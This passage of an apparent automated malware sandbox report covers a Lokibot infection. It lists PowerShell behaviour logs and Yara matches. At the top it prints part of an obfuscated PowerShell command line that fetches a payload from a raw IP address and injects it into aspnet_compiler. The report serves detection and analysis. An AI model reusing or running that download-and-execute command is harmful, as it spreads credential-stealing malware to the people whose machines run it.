@(iuatxt.klgol/33/631.342.3.291//:p'+'tthiua'+', iuad'+'esativadoiua, iuadesativadoiua, iuadesativ'+'adoiua, iuaaspnet_compileriua, iuadesati'+'vadoiua, iuadesativadoiua,iu'+'adesativadoiua,iuadesativadoiua,iuadesativadoiu'+'a,iuadesativadoiu'+'a,iuadesativadoiua,i'+'ua1iua,iuadesativadoiua)'+');') -creplace([char]73+[char]117+[char]97),[char]39 -creplace([char]51+[char]90+[char]68),[char]36-creplace ([char]122+[char]119+[char]118),[char]124))"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
